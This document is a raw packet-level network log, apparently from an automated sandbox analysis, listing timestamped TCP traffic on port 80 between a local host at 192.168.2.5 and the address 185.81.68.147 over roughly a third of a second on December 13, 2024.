Dec 13, 2024 01:37:31.729746103 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.731225967 CET	80	49758	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.731664896 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.731718063 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.731798887 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.731846094 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.734863043 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.734896898 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.734918118 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.734941006 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.736753941 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.736809015 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.736872911 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.736920118 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.739352942 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.739434958 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.739499092 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.741906881 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.742044926 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.742099047 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.744478941 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.744537115 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.744597912 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.744786024 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.747015953 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.747071028 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.747101068 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.747148991 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.749594927 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.749742031 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.749804020 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.752420902 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.752454996 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.752510071 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.754791975 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.754848003 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.754889011 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.755103111 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.757252932 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.757313967 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.757375956 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.757425070 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.759893894 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.759987116 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.760006905 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.760034084 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.762386084 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.762439966 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.762481928 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.762530088 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.765065908 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.765100002 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.765126944 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.765136957 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.767478943 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.767529011 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.767529964 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.767574072 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.770005941 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.770059109 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.770078897 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.770128012 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.772588968 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.772655964 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.772663116 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.772705078 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.775105953 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.775160074 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.775228024 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.775276899 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.777749062 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.777801037 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.777829885 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.777879000 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.780247927 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.780356884 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.780405045 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.780457020 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.835441113 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.835498095 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.835601091 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.836533070 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.836566925 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.836730957 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.837992907 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.839087963 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.839122057 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.839148045 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.839160919 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.840781927 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.840909004 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.840961933 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.843394041 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.843426943 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.843477011 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.845040083 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.845473051 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.845526934 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.846934080 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.846966982 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.847022057 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.848814011 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.849070072 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.849138975 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.850744963 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.850797892 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.850811005 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.850851059 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.852686882 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.852739096 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.852744102 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.852794886 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.854610920 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.854645014 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.854670048 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.854691982 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.856415033 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.856514931 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.858249903 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.858433962 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.860191107 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.860224009 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.860477924 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.861808062 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.862188101 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.862250090 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.863656044 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.863689899 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.863712072 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.863742113 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.865731955 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.865766048 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.865820885 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.867136955 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.867259026 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.867322922 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.868794918 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.868844986 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.868889093 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.870547056 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.870599985 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.870898962 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.872437954 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.872471094 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.872492075 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.872508049 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.873996973 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.874047995 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.874099016 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.875600100 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.875652075 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.875677109 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.875771046 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.877274990 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.877326965 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.877408981 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.877456903 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.878935099 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.878987074 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.878995895 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.879034042 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.880511045 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.880564928 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.880688906 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.880748987 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.882467031 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.882502079 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.882519960 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.882550955 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.883773088 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.883822918 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.883852959 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.883990049 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.885389090 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.885438919 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.885494947 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.885545969 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.887005091 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.887056112 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.887100935 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.887149096 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.888570070 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.888618946 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.888673067 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.888725042 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.890230894 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.890264988 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.890285969 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.890306950 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.891745090 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.891797066 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.891859055 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.891912937 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.893250942 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.893297911 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.893477917 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.893527031 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.894382000 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.894416094 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.894433022 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.894457102 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.895081997 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.895131111 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.895190001 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.895236969 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.896030903 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.896164894 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.896173954 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.896527052 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.896943092 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.896997929 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.897022009 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.897069931 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.897816896 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.897891998 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.897936106 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.897986889 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.898767948 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.898823023 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.898885012 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.898933887 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.899837971 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.899872065 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.899888992 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.899915934 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.900645971 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.900679111 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.900696993 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.900721073 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.902034998 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.902067900 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.902082920 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.902113914 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.902492046 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.902532101 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.902539968 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.902580023 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.903254032 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.903318882 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.903400898 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.903448105 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.904182911 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.904232979 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.904354095 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.904402018 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.905169964 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.905219078 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.905267000 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.905314922 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.906017065 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.906068087 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.906682014 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.906735897 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.907012939 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.907046080 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.907063007 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.907088995 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.907819986 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.907871962 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.908276081 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.908327103 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.908823013 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.908873081 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.908936024 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.908982992 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.909627914 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.909674883 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.909681082 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.909723997 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.910542965 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.910590887 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.910708904 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.910753012 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.027211905 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.027288914 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.027349949 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.027396917 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.027854919 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.027868032 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.027899027 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.028789997 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.028801918 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.028836012 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.029413939 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.029455900 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.030563116 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.030575037 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.030585051 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.030607939 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.030628920 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.031209946 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.031250954 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.031366110 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.031404018 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.032542944 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.032556057 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.032588005 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.032975912 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.033019066 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.033047915 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.033086061 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.034085989 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.034096003 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.034244061 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.034259081 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.034827948 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.034838915 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.034873009 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.035599947 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.035612106 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.035640001 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.035664082 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.036578894 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.036607981 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.036660910 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.037271023 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.037327051 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.037377119 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.038053989 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.038098097 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.038336039 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.038980007 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.039028883 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.039032936 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.039817095 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.039875984 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.039880037 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.039916039 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.040795088 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.040807009 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.040858030 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.041495085 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.041709900 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.041776896 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.042555094 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.042567015 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.042613983 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.043370962 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.043382883 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.043431044 CET	49753	80	192.168.2.5	185.81.68.147
